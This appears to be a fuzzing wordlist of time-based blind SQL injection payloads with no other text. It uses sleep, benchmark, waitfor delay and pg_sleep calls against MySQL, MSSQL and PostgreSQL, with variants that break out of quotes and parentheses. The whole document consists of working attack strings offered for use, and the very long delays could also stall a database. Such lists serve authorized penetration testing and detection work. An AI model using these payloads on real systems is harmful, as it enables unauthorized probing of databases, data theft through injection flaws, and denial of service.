sleep(100000)#
1 or sleep(100000)#
" or sleep(100000)#
' or sleep(100000)#
" or sleep(100000)="
' or sleep(100000)='
1) or sleep(100000)#
") or sleep(100000)="
') or sleep(100000)='
1)) or sleep(100000)#
")) or sleep(100000)="
')) or sleep(100000)='
;waitfor delay '0:0:100000'--
);waitfor delay '0:0:100000'--
';waitfor delay '0:0:100000'--
";waitfor delay '0:0:100000'--
');waitfor delay '0:0:100000'--
");waitfor delay '0:0:100000'--
));waitfor delay '0:0:100000'--
'));waitfor delay '0:0:100000'--
"));waitfor delay '0:0:100000'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(100000)--
1 or pg_sleep(100000)--
" or pg_sleep(100000)--
' or pg_sleep(100000)--
1) or pg_sleep(100000)--
") or pg_sleep(100000)--
') or pg_sleep(100000)--
1)) or pg_sleep(100000)--
")) or pg_sleep(100000)--
')) or pg_sleep(100000)-- 
